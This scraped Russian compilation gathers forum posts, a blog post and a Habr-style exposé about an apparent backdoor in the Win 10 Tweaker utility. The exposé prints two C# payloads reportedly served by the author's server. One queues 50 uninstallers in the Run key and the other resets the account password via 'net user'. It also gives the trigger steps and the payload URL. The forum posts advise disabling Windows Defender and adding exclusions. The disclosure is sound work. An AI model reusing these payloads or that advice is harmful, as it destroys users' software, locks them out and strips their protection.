Форумчанин 5955 / 4190 / 405 Регистрация: 28.12.2013 Сообщений: 24,134 |
|
21.10.2021, 13:12 |
5 |
Winston Mint, не включается, если отключить службу через риестр
0 |
1668 / 967 / 99 Регистрация: 27.02.2021 Сообщений: 4,823 |
|
21.10.2021, 16:37 |
6 |
лучше не пользуйся твикером, ничего этот хлам не дает На 7, 8, 10, 11 пользуюсь ХРTweaker, даёт всё, что мне нужно, никогда ничего не спортил, кому хлам, кому полезное приложение.
0 |
Робот сгибальщик 1183 / 516 / 110 Регистрация: 29.07.2020 Сообщений: 2,721 Записей в блоге: 7 |
|
21.10.2021, 20:33 |
7 |
Обязательно внести в исключения антивируса.
0 |
IT_Exp Эксперт 87844 / 49110 / 22898 Регистрация: 17.06.2006 Сообщений: 92,604 |
21.10.2021, 20:33 |
Помогаю со студенческими работами здесь После неудачной установки Win10 не могу попасть в БИОС PC Security Tweaker Сеть между Win10 Pro и Win10 LTSC Нетбук MSI U135DX ломает голову отсутствием с завода дисководом! Не могу воткнуть win10 Нету раздела OC tweaker в биосе не могу зайти на сайтыЖ: одноклассники,в контакте,не открывает почту с xls файлами,не могу открыть рабочие сайты Искать еще темы с ответами Или воспользуйтесь поиском по форуму: 7 |
Skip to content
- ТВикинариум
- Форум
- Поддержка
- PRO
- Войти
ФорумXpucT2022-08-18T02:06:35+03:00
Вы должны войти, чтобы создавать сообщения и темы.
Цитата: Сергей от 30.10.2021, 15:04
Установил сегодня wi10 pro 21Н1 с образа скаченного 29.10.21 у майкрософт, сборка 19043.1320. Прошлая версия твикера 18.0 pro (невижу где написан номер билда) не удаляет защитник виндовса. Вроди как удалила но всеравно блокирует активатор и другие ПО, после перезагрузки винды пункт в меню твикера отмечается как неактивирована деактивайия защитника. Скачал сегодня твикер заново, невозможно указать точную сборку и билд, т.к винда сразу после запуска удаляет твикер. Старый твикер винда не трогает. Что делать? закончилась лафа?))
Установил сегодня wi10 pro 21Н1 с образа скаченного 29.10.21 у майкрософт, сборка 19043.1320. Прошлая версия твикера 18.0 pro (невижу где написан номер билда) не удаляет защитник виндовса. Вроди как удалила но всеравно блокирует активатор и другие ПО, после перезагрузки винды пункт в меню твикера отмечается как неактивирована деактивайия защитника. Скачал сегодня твикер заново, невозможно указать точную сборку и билд, т.к винда сразу после запуска удаляет твикер. Старый твикер винда не трогает. Что делать? закончилась лафа?))
Голосуйте — палец вниз.0Голосуйте — палец вверх.1
Цитата: Adler от 30.10.2021, 15:16
Добрый день.
Перед первым использованием отключити Защитник вручную, а потом снесите его твикером.
Эта тема 100500 раз обсуждалась. Ищите на форуме. Тема закрыта.
Добрый день.
Перед первым использованием отключити Защитник вручную, а потом снесите его твикером.
Эта тема 100500 раз обсуждалась. Ищите на форуме. Тема закрыта.
Голосуйте — палец вниз.0Голосуйте — палец вверх.1
Всем привет! Меня зовут Тилек, и я пользуюсь Windows. Меня эта операционная система вполне устраивает. У меня видавший виды б/у-ный служебный ноутбук HP ProBook 4540s, который у меня с 2015 года. Модель старая, да и сам ноут не новый, и с тех пор он успел побывать несколько раз в ремонте. В начале прошлого года я перешел с Windows 7 на Windows 10, и тогда скорость работы ноутбука заметно снизилась. Я искал программы по оптимизации ОС, которые могли бы увеличить производительность и быстродействие. Тогда я и наткнулся на Win 10 Tweaker.
Сначала я перепробовал несколько других программ, которые поисковик выдавал в топ-листе типа «15 лучших программ для оптимизации вашего компьютера». Толку от таких программ мало: ноут быстрее не станет, но теперь будет еще и с рекламными уведомлениями. На YouTube я наткнулся на ролик «Заметки о разработке Win 10 Tweaker», где автор рассказывал о своей программе по оптимизации ОС Windows. Посмотрев ролик, я скачал программу (всего полтора мегабайта). Установка не требовалась. Запустив файл exe, можно сразу приступать к оптимизации сделав несколько кликов.
После запуска Твикер начинает считывать все параметры системы, не сохраняя никаких надстроек, ничего не записывая в реестр (по словам автора). Перед применением программы настоятельно рекомендуется вручную создать точку восстановления системы (а лучше и вовсе резервную копию Windows 10). Автор Win 10 Tweaker отдельно предупреждает о том, что предполагает, что утилита будет запущена в чистой Windows 10, а не в какой-либо сборке или иным образом модифицированной системе — в этом случае вероятность того, что что-то пойдет не так возрастает.
Есть большая вероятность, что ваш антивирус может заблокировать запуск Win 10 Tweaker или сообщить о том, что это потенциально нежелательное ПО, такой же отчет вы увидите и в VirusTotal (не исключено, что, это действительно так).
После запуска программы и принятия лицензионного соглашения вы увидите интерфейс, типичный для твикеров — возможности, отсортированные по категориям, в каждой из которых можно выбрать нужные параметры оптимизации и применить их кнопкой слева внизу. В Win 10 Tweaker при наведении указателя мыши на заголовки настроек в панели слева отображается описание этого пункта, для некоторых разделов описание дается для всего раздела целиком.
Опции
Конфиденциальность — параметры для отключения различных функций телеметрии (слежки).
Контекстное меню — добавление полезных и удаление ненужных пунктов контекстного меню.
Интерфейс — варианты оптимизации внешнего вида.
Система — изменение некоторых опций системы, отключение компонентов Windows 10 (например, возможность отключить Защитник Windows 10, включить старый просмотр фотографий, удалить OneDrive).
Службы — отключение «ненужных» служб Windows 10 и служб, отвечающих за обновления, некоторые возможности телеметрии. Состояние (включена-отключена) служб изменяется путем нажатия по её названию.
Очистка — удаление временных и других ненужных файлов, кэша браузеров и игр, кэша установщиков и других элементов.
Приложения — удаление (с возможность восстановления) встроенных приложений.
Автозагрузка — программы и другие объекты в автозагрузке с возможностью их отключения и включения. На эту тему: Как удалить и добавить программы в автозагрузку Windows 10.
Оптимизация — опции сжатия ОС и системных файлов, хранилища WinSxS, очистки от устаревших драйверов, возможность удаления дубликатов файлов с диска.
Проверка на вирусы — возможность проверки файлов в интерфейсе Win 10 Tweaker через API VirusTotal.
Системная информация — базовые сведения об операционной системе и оборудовании компьютера.
Скрытая угроза
Проблема у меня случилась через пару дней после применения Твикера. У меня пропал доступ в корпоративную сеть. Я не применял все подряд твики, я читал инструкцию и соглашение. Я применял твики по очистке кэша, по отключению ненужных служб диагностики и службы телеметрии, а все что касалось сервера и общего доступа не трогал. Но для корпоративной сети я стал невидим. Откат всех примененных твиков не помогал. В итоге несколько дней системный администратор заново устанавливал и настраивал доступ моей учетной записи.
Работает ли Win 10 Tweaker? Да, работает. Все заявленные опции программы применяются. Но помимо этого программа может заниматься побочной деятельностью, что чревато для пользователя проблемами. Результат может быть самым разнообразным. Если по прошествии какого-то времени вы столкнетесь с тем, что какие-то компоненты системы отказываются работать, программы, «завязанные» на серверы Майкрософт, сообщают об ошибках, нужная служба не запускается, ссылаясь на зависимые службы (Не удалось запустить дочернюю службу или группу), не исключено, что причина в проделанной когда-то оптимизации.
Чтобы грамотно использовать программу вы должны хорошо разбираться в работе и настройке операционной системы. Но если вы разбираетесь, то вы и так сможете оптимизировать работу ОС, без этой программы. Лично для меня это будет хорошим уроком, не устанавливать направо и налево первые попавшиеся утилиты.
Вывод
Но Твикеры — не панацея. То что они работают без проблем у большинства, не гарантирует того, что у вас все пойдет как по маслу. Операционная система не простая вещь, разбираться в ней трудно, но нужно. Первый шаг для этого — открыть диспетчер задач и посмотреть какие процессы идут в данный момент, и на сколько загружены память и процессор. В Windows много ошибок, но работа конкретно вашего ПК или ноутбука зависит от вас.
P.S. Пост был убран из публикации после того, как в комментах меня начали обвинять в агитке и рекламе Твикера. Хоть я и написал, что лично пострадал от данной программы. Но я решил вернуть в публикацию, так как считаю что информация все же может быть полезной и заставит передумать тех, кто думает устанавливать Win 10 Tweaker!
В погоне за конфиденциальностью, большинство пользователей и не подозревают, как добровольно делятся своими данными с разработчиками разных программ, которые якобы защищают приватность пользователя.
Речь пойдет о программе «Win 10 Tweaker» в которой пользователь «Sanctuarys» из ресурса «Хабр» нашёл бэкдор, который был замечен ещё осенью 2020 года.
Win 10 Tweaker — известная программа, которую используют, чтобы отключить сбор данных в Windows 10. «Sanctuarys» установил саму программу с официального сайта. Выдал все запрашиваемые разрешения и затем начал прослушивать трафик приложения.
Win 10 Tweaker скачал с
ресурса исполняемый код написанный на C#, который записывает в реестр указания удалить 50 первых установленных программ пользователя. При первом входе или выходе из учётной записи, эти программы запустили свои деинсталляторы.
Осенью, на том же
был найден C#-код, который устанавливает на учётную запись пароль «Rock5taR». То есть, если у вас установлен Win 10 Tweaker, разработчик может исполнять любой код на вашем ПК с этого
.
Скажу проще, ваш ПК в чужих руках из-за одной установленной программы. Код исполняется запрашивается и исполняется через Win 10 Tweaker.
Что делать? Удалить Win 10 Tweaker и очистить раздел «Автозагрузка» от подозрительных программ.
И пусть лучше Microsoft собирает ваши данные, чем кто-то делает на вашем ПК непонятно что.
На данный момент
программы заблокирован, но шанс наличия дополнительного зеркала для бэкдора все равно остается. Настоятельно рекомендую удалить Win10 Tweaker с вашего компьютера.
Спасибо за предоставленный материал:
-
#1
Win 10 Tweaker — популярная программа для быстрой и удобной оптимизации Windows в несколько кликов. Может отключать ненужные конфигурации, оставив только самые востребованные параметры и опции, что значительно повысит производительность ПК.
Непонятный срач по поводу Win 10 Tweaker
Появился пост на Хабре, который позднее заблокировали (пост в архиве).
Весь срач в комментариях тут: repack.me
Комментарии от аватар программы: https://t.me/win10tweaker/48
Последнее редактирование: 15.05.2021
-
#2
А давайте выскажусь как это все выглядит с моей точки зрения.
Не углубляясь в код и прочую не интересную мне лично хрень которая разошлась таким диким срачем как со стороны сообщества, хостера, а так же вообще некрасивым говном на вентилятор со стороны автора, который по факту выпускает
программный продукт реально ломающий целостность кода коммерческой операционной системы с закрытым исходным кодом
, тем самым нарушая ее работоспособность предусмотренную разработчиком, а так же цепляя налево и направо тот код и функционал о котором автору вполне вероятно даже неизвестно хочу сказать со стороны точки зрения технического специалиста Удостоверяющего центра СКБ Контур то что перед тем как осуществлять настройку рабочего места клиенту мы всегда первым делом удаляем все Твикеры (*уикеры), Классик меню, Менеджеры браузеров, Адвизоры, Ускорители (замедлители) и всю прочу по**бень, дабы вернуть систему в исходное состояние (sfc /scannow), иначе косяки лезут как из рога изобилия именно благодаря этим ноу-хау программулькам которые были столь популярны в начале 2000-х, и по какой то неведомой мне причине таковыми остаются до сих пор, благодаря чему ПО которое необходимо для работы людям которые РАБОТАЮТ не функционирует как положено, уже молчу о безопасности системы в целом. Кроме всего прочего, если любая прокладка между стулом и клавиатурой после установки этого » ноу-хау добра» обращается в поддержку любого более-менее крупного разработчика то она автоматом посылается на*уй именно по причине наличия в ОС установленной этой ху*ни.
-
#3
ЗЫ, помню ещё со времен XP…
Такая дичь, эти оптимизаторы, оформители, ускорители..
Народ накачает оптимизаторского говна, оформят десктоп темы и сидят скрины публикуют, типо я хацкер, смотрите, какой у меня реактивный агрегат…
-
#4
Частично соглашусь с bat и GiT по поводу украшательств OS и свистоперделок.
Такие вещи приходилось самому удалять у клиентов , чтобы оживить систему.
Даже скажу больше, приходилось удалять бесплатные антивирусы, (тот же Avast), которые не только дико замедляли работу, но и давали такие ошибки, источники которых, трудно было предпроложить, пока не удалишь антивирус.
НО не имею ничего против твикеров, как ПО собирающего настройки в одном месте при условии, что это не разрушает OS.
Это удобно.
Что касается десятки, то на этого монстра, правда хочется найти управу.
Хотя бы потому, что телеметрия жрёт неимоверное количество трафика.
А ещё обновления гигантских размеров.
В условиях безлимита ещё терпимо.
А если у клиента мобильное соединение ? Скажу сразу, что объявить соединение лимитным тоже не всегда помогает.
Что-то приходится придумывать.
У себя через Mikrotik заблокировал часть телеметрии, всю, увы невозможно, так как адреса меняются.
А у клиентов использую твикер в том числе. Вот этот.
Думаю, что Gold Microsoft Partner не будет портить систему и рисковать репутацией.
-
#5
Win10Tweaker отличная программа! Какой бы там (выше) спецтехпро не говорил своё мнение. Вот я как пользователь (винды) выше среднего уровня крайне доволен фишками, что дает данный твикер.
Да и автор твикера классный мужик. Убежден что он знает что делает и создает.
-
#6
Ничего себе, что творится. Можно по-разному относиться к твиерам-уикерам. Например, уважаемый bat считает, что
программный продукт реально ломающий целостность кода коммерческой операционной системы с закрытым исходным кодом, тем самым нарушая ее работоспособность предусмотренную разработчиком
Но! Если говорить о конкретной программе — Win 10 Tweaker — насколько мне известно, она ничего не ломает, она включает/отключает настройки «системного реестра» Windows. Т.е. использует инструмент настройки, предусмотренный разработчиком ОС. Никакие системные файлы и библиотеки она не ломает и не патчит. Я ошибаюсь?
-
#7
Ничего себе, что творится. Можно по-разному относиться к твиерам-уикерам. Например, уважаемый bat считает, что
Но! Если говорить о конкретной программе — Win 10 Tweaker — насколько мне известно, она ничего не ломает, она включает/отключает настройки «системного реестра» Windows. Т.е. использует инструмент настройки, предусмотренный разработчиком ОС. Никакие системные файлы и библиотеки она не ломает и не патчит. Я ошибаюсь?
Не ошибаешься. Так и есть.
ggnk
Созидатель (II)
-
#9
На официальном сайте сайте разраба
-
#10
Но! Если говорить о конкретной программе — Win 10 Tweaker — насколько мне известно, она ничего не ломает, она включает/отключает настройки «системного реестра» Windows. Т.е. использует инструмент настройки, предусмотренный разработчиком ОС. Никакие системные файлы и библиотеки она не ломает и не патчит. Я ошибаюсь?
Снова отвечу, поясню, для тех кто не понял что я хотел сказать. Про бекдор говорить не буду, я лично о своем отношении к ПО данного типа.
Синоним к слову «ломает» — «нарушает», то есть вредит (еще синоним) целостности системы, которая состоит из охренительного множества компонентов которые зависят друг от друга (работают как система, по этому Windows и называется операционная СИСТЕМА, а не графическая оболочка) суть от этого не меняется, если у одного все работает прекрасно ввиду скудности необходимого ему функционала, то у других будут реальные проблемы, не просто так программы подобного рода определяются антивирусами как вредное ПО, неужели не понятно из моего первого сообщения о чем речь? Если бы все было так бело и пушисто, то он бы удосужился согласовать свою херню с Майками.
Читаем пункты настройки этой приблуды (Win 10 tweaker) и видим несколько раз слово «выпиливание«, ничего не напоминает (синонимы, последствия)?
Повторюсь:
Разработчик твикера не знает и знать не может какие процессы системы будут нарушены в итоге его этих «выпиливаний» того или иного, нужно быть совсем с высохшим мозгом чтобы этого не понимать, у него нет команды тестеров, а если и есть то тестить нужно его прогу + ОС, не думаю что у него штат больше чем у Microsoft, он не делает релизы своего волшебства заточенными под политику обновлений ОС, так как он не знает какие изменения вносятся с каждым новым релизом ОС и под что ему подстраиваться, по этому и выпускает более-менее заметный своим функционалом ширпотреб не вдаваясь в детали, у него есть спонсоры, к этому и сводится вся его деятельность — заработок.
Статью на Хабре вернули, про бекдоры так же написано на Руборде, на Пикабу так же повтор:
Ну и тут чуток, кому читать впадлу:
Хватит строить иллюзии относительно, как их назвал @Starwanderer , свистоперделок, они никогда не делались идеально, с добрым умыслом и без желания получить профит, а если и делались, то максимум до той поры пока компы не стали частью обычной домашней техники которая есть почти у всех, ну и интернет стал массово доступен, разумеется.
На сим раскланяюсь, хотите — устанавливайте и пользуйтесь, но когда у вас недиагностируемые баги полезут избавьте от вопросов в разделе Windows почему так случилось, тем более что ваш любимый твикер отключит самодиагностику системы и логи удалит.
Последнее редактирование: 01.06.2021
-
#11
Не вернули, это другая статья…
Вообщем вес срач из-за того, что твикер имеет скрытую, но юридически оговорённую функцию, которая позволяет Автору, через интернет загружать пользователю произвольный код. Это не значит, что функция уязвима или загружаемый произвольный код обязательно вредоносный (со слов автора)…
Простыми словами можно сказать так: Я могу, но я не буду, честное пионерское…
Теоретически, автор имеет возможность загрузить вредоносный код. Однако автор не занимается подобными вещами и подобных прецедентов нет.
Это тоже самое, что если бы Хром вместо обновлений загрузил бы вреданос… Теоретически возможно? Да… На практике, прецедентов нет…
Клевета в видео про Win10Tweaker
Опять клевета…
-
#12
ЗЫ, помню ещё со времен XP…
Такая дичь, эти оптимизаторы, оформители, ускорители..
Народ накачает оптимизаторского говна, оформят десктоп темы и сидят скрины публикуют, типо я хацкер, смотрите, какой у меня реактивный агрегат…
Посмотреть вложение 2300
nice )
Антивирусная защита, Информационная безопасность, Системное администрирование, Разработка под Windows, Софт
Рекомендация: подборка платных и бесплатных курсов Java — https://katalog-kursov.ru/
Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом. Эту достаточно узкую нишу охватывают разработчики всевозможных твикеров, один из которых в своих подходах к защите своей программы пошел самым радикальным способом. Сегодня мы немножко препарируем один самых известных таких продуктов — Win 10 Tweaker и посмотрим, какой «сюрприз» спрятал внутри его создатель.
Решил оформить небольшой материал с доказательствами того, как с недавних пор (примерно с осени 2020 года) в Win 10 Tweaker в целях борьбы со взломом программы был интегрирован самый обычный бэкдор, в особых обстоятельствах получающий зловредный код с ресурса https://win10tweaker.com/PrivilegeUser.php?key=Universal.
Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме, а поговорим о том, что нам поведал сниффер трафика Win 10 Tweaker, у которого на момент написания статьи, судя по счётчику на сайте, больше 1 400 000 скачиваний.
-
Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
-
Выяснилось, что, чтобы вызвать скачивание удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net, а внутри — просто пустой файл System.Deps.dll;
-
Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
-
Хватит лишь открытия раздела «Системная информация», где можно получить сведения о характеристиках ПК;
-
Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.
using System;
using System.Collections.Generic;
using Microsoft.Win32;
using System.IO;
namespace N {
class C {
public void M() {
string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\AppData\Local\Turbo.net";
if (Directory.Exists(path)) {
string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
foreach(string file in files) {
if (file.Contains("System.Deps.dll")) {
List list = new List();
using(RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall")) {
foreach(string k in key.GetSubKeyNames()) {
if (key.OpenSubKey(k).GetValue("UninstallString") != null) {
list.Add(key.OpenSubKey(k).GetValue("UninstallString").ToString());
}
}
}
for (int i = 0; i < 50; i++) {
RegistryKey key = Registry.LocalMachine.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
key.SetValue(i.ToString(), list[i]);
}
}
}
}
}
}
}
Разберем по-быстрому код.
-
Берется путь профиля и присобачивается к нему «\AppData\Local\Turbo.net»;
-
Если имеется папка Turbo.net, то по маске *.* рекурсивно ищется файл System.Deps.dll;
-
Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLMSOFTWAREMicrosoftWindowsCurrentVersionUninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляете в Windows любую программу, если ее деинсталлятор прописывается в системе.
-
Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.
Сохраненная ссылка на Wayback Machine, если «чудотворным» образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php?key=Universal.
Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.
Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.
using System;
using System.Diagnostics;
using System.IO;
namespace N
{
class C
{
public void M()
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\AppData\Local\Turbo.net";
if (Directory.Exists(path))
{
string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
foreach (string file in files)
{
if (file.Contains("System.Deps.dll"))
{
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = "/c net user " + """ + Environment.UserName + """ + " Rock5taR",
WindowStyle = ProcessWindowStyle.Hidden
});
}
}
}
}
}
}
Также автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCUSoftwareWin 10 Tweaker, так как программа меняет права доступа на этот раздел.
Видео с одним из вариантов, как удалить ключ.
Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.
upd1: все ресурсы заблокировал хостер.
upd1: реакция автора трояна.
upd3: реакция автора трояна в виде аудио-послания: https://t.me/win10tweaker/48
Спойлер: он считает, что все сделал правильно, мы все убоги и, оказывается, завидуем его успеху, а этот «инцидент» — жирный намек.
upd4: после связи с модератором rutracker.org все темы с Win 10 Tweaker были удалены (кроме совсем старых). Модератор в теме на NNM продолжает банить пользователей и удалять их сообщения при упоминании трояна и этой статьи. Все как всегда.